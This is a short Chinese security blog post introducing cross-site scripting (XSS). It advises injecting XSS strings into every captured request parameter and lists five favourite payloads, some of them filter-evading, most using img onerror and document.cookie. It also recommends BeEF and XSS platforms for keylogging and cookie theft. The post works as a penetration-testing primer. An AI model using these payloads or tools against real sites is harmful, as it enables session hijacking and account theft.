说好的见框就插呢?
作者:@Xuno
本文为作者原创,转载请注明出处:https://www.cnblogs.com/MaoheLaoXu/p/17562130.html
背景
每一个学安全的,都听说过一句话,挖XSS就是见框就插,不得不说这个方法很有用,但是经常遇到插不进去的情况。今天浅聊一下XSS漏洞
一句话讲原理
XSS原理和注入很像,核心也是用户输入的数据被当作代码执行了,一个是插入了数据库语句,一个是插入了JS语句
速挖XSS
(1)基础方法:
见框就插的原理是因为,http传参通常是通过这种方法传参的,本质是通过参数去传入xss语句,所以我们抓包对所有有参数的地方进行xss语句拼接会发现更多以前没发现的点
可以一个个插入恶意语句试试
(2)个人常用语句
每一个都很好用!
\u201c\u003e\u003cimg src=1 onerror=alert(document.cookie)\u003e
<img src=1 onerror=alert(document.cookie)>
%22onclick=prompt+1
1;{onerror=alert}throw 1337
"><img src=1 onerror = top['ale'+'rt'](1)>
(3)利用工具
分享个人经常使用的利用工具,可以屏幕截图,键盘记录,偷取cookie等操作
kali自带的beefxss工具很好用!
xss平台也很不错!
如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮,您的“推荐”将是我最大的写作动力!欢迎各位转载,但是未经作者本人同意,转载文章之后必须在文章页面明显位置给出作者和原文连接,否则保留追究法律责任的权利。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步